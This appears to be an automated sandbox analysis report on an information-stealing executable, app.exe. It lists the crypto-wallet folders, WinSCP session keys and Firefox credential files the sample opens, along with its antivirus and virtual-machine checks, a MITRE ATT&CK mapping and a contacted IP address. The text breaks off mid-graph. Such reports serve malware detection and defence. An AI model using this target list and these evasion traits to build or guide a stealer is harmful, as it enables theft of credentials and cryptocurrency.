Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\ElevatedDiagnostics VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Google VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Google\CrashReports VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Google\Software Reporter Tool VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\History\desktop.ini VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\History\desktop.ini VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\History\Low VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\IconCache.db VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\IconCache.db VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Intel\CUIPromotions VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Intel\Games VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\EdgeBho VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Feeds VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\GameDVR VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\InputPersonalization VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Internet Explorer VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\OneDrive VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\PlayReady VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\XboxLive VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\MicrosoftEdge VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\MicrosoftEdge\SharedCacheContainers VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\ActiveSync VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\AppUp.IntelGraphicsExperience_8j3eq9eme6ctt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.549981C3F5F10_8wekyb3d8bbwe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Framework.1.7_8wekyb3d8bbwe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Framework.2.2_8wekyb3d8bbwe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Runtime.1.7_8wekyb3d8bbwe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Runtime.2.2_8wekyb3d8bbwe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.People_8wekyb3d8bbwe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Print3D_8wekyb3d8bbwe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Services.Store.Engagement_8wekyb3d8bbwe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.UI.Xaml.2.1_8wekyb3d8bbwe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.UI.Xaml.2.6_8wekyb3d8bbwe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.UI.Xaml.2.7_8wekyb3d8bbwe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.VCLibs.140.00_8wekyb3d8bbwe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.NarratorQuickStart_8wekyb3d8bbwe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.XGpuEjectDialog_cw5n1h2txyewy VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAppRuntime.1.2_8wekyb3d8bbwe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCamera_8wekyb3d8bbwe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Xbox.TCUI_8wekyb3d8bbwe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.XboxApp_8wekyb3d8bbwe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\SpotifyAB.SpotifyMusic_zpdnekdrzrea0 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\windows_ie_ac_001 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\PeerDistRepub VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\PlaceholderTileLogoFolder VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Publishers VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\0353475199 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\0487075091 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\0615447233 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\0615447233 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\0666563528 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\0666563528 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\0825612946 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\0887538035 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\0939541263 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\0939541263 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1169381505 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1244065654 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1287572840 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1287572840 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1343496627 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1343496627 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1387277564 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1387277564 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1417002460 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2165547404 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2165547404 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2265332024 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2265465471 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2874006916 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\3677062445 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\acrord32_sbx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\B018D45B-96A4-4B60-BED4-BC78D47B50F2 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\hsperfdata_user VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Importer_6_Default_4 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Low VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MpCmdRun.log VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MpCmdRun.log VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Symbols VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\TCDE6D1.tmp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\TCDE6EA.tmp VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0041C882 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_0041C882
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0041DD1B GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0041DD1B
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00415DDE EntryPoint,GetVersionExA,GetModuleHandleA,GetModuleHandleA,GetCommandLineA,GetStartupInfoA,GetModuleHandleA,0_2_00415DDE
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

Stealing of Sensitive Information

barindex
Found many strings related to Crypto-Wallets (likely being stolen)
Source: app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Electrum\wallets\tjYCo5b
Source: app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Electrum\wallets\tjYCo5b
Source: app.exe, 00000003.00000003.3098259663.0000000000956000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :"AtomicWallet","path":"%APPDATA%\\atomic\\Local Storage\\leveldb\\"},{"name":"Exodus","path":"%APPDATA%\\exodus\\exodus.wallet\\"},{"name":"JaxxWallet","path":"%APPDATA%\\Wallets\\Jaxx\\com.liberty.jaxx\\IndexedDB\\file__0.indexeddb.leveldb\\"},{"
Source: app.exe, 00000003.00000003.3098259663.0000000000956000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :"AtomicWallet","path":"%APPDATA%\\atomic\\Local Storage\\leveldb\\"},{"name":"Exodus","path":"%APPDATA%\\exodus\\exodus.wallet\\"},{"name":"JaxxWallet","path":"%APPDATA%\\Wallets\\Jaxx\\com.liberty.jaxx\\IndexedDB\\file__0.indexeddb.leveldb\\"},{"
Source: app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Ethereum\keystore\XdPr
Source: app.exe, 00000003.00000003.3292397056.000000000556B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Exodus
Source: app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Ethereum\keystore\XdPr
Source: app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Coinomi\Coinomi\wallets\
Source: app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\exodus\exodus.wallet\Y
Source: app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Ethereum\keystore\XdPr
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeFile opened: C:\Users\user\Local Settings\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.dbJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeFile opened: C:\Users\user\Application Data\Mozilla\FirefoxJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeFile opened: C:\Users\user\Local Settings\Mozilla\Firefox\Profiles\kzpbmws1.default\key4.dbJump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeFile opened: C:\Users\user\AppData\Roaming\exodus\exodus.wallet\Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeFile opened: C:\Users\user\AppData\Roaming\exodus\exodus.wallet\Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts331
Windows Management Instrumentation		1
DLL Side-Loading		1
DLL Side-Loading		1
Disable or Modify Tools		1
OS Credential Dumping		2
System Time Discovery		Remote Services1
Archive Collected Data		1
Ingress Tool Transfer		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Native API		1
Bootkit		11
Process Injection		1
Deobfuscate/Decode Files or Information		1
Input Capture		2
File and Directory Discovery		Remote Desktop Protocol3
Data from Local System		21
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
Obfuscated Files or Information		1
Credentials in Registry		45
System Information Discovery		SMB/Windows Admin Shares1
Input Capture		3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Software Packing		NTDS461
Security Software Discovery		Distributed Component Object ModelInput Capture14
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets13
Virtualization/Sandbox Evasion		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
File Deletion		Cached Domain Credentials1
Process Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items13
Virtualization/Sandbox Evasion		DCSync1
Application Window Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
Process Injection		Proc Filesystem2
System Network Configuration Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
Bootkit		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1436386 Sample: app.exe Startdate: 05/05/2024 Architecture: WINDOWS Score: 100 29 api.ipify.org 2->29 35 Snort IDS alert for network traffic 2->35 37 Multi AV Scanner detection for submitted file 2->37 39 Machine Learning detection for sample 2->39 41 2 other signatures 2->41 9 app.exe 5 2->9         started        signatures3 process4 file5 27 C:\Users\user\AppData\Local\Temp\...\app.exe, PE32 9->27 dropped 43 Detected unpacking (creates a PE file in dynamic memory) 9->43 45 Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines) 9->45 47 Contains functionality to infect the boot sector 9->47 49 Queries memory information (via WMI often done to detect virtual machines) 9->49 13 app.exe 10 9 9->13         started        17 conhost.exe 9->17         started        signatures6 process7 dnsIp8 31 144.208.127.230, 49789, 80 SHOCK-1US United States 13->31 33 api.ipify.org 172.67.74.152, 443, 49788 CLOUDFLARENETUS United States 13->33 51 Multi AV Scanner detection for dropped file 13->51 53 Detected unpacking (creates a PE file in 